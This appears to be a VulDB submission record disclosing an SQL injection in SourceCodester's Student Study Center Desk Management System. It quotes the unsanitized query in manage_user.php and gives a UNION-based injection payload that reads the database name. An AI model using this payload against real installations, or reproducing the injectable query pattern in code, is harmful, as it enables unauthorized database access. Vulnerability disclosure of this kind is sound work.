| Título | Student Study Center Desk Management System exist Sql injection Vulnerability . |
|---|
| Descrição | Vulnerability file location:/admin/user/manage_ user.php
look at this source code
```
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
```
There is no detection and filtering of $id, and malicious data can be constructed here to attack the website database.
The construction statement is as follows
```
? page=user/manage_ user&id=0' union select 1,database(),3,4,5,6,7,8,9,10,11--+
```
https://s1.ax1x.com/2023/03/15/pp1gd8x.png
Source link
https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| Fonte | ⚠️ https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| Utilizador | qidian (UID 30810) |
|---|
| Submissão | 15/03/2023 05h53 (há 3 anos) |
|---|
| Moderação | 15/03/2023 07h31 (2 hours later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 223111 [SourceCodester Student Study Center Desk Management System 1.0 manage_user.php ID Injeção SQL] |
|---|
| Pontos | 20 |
|---|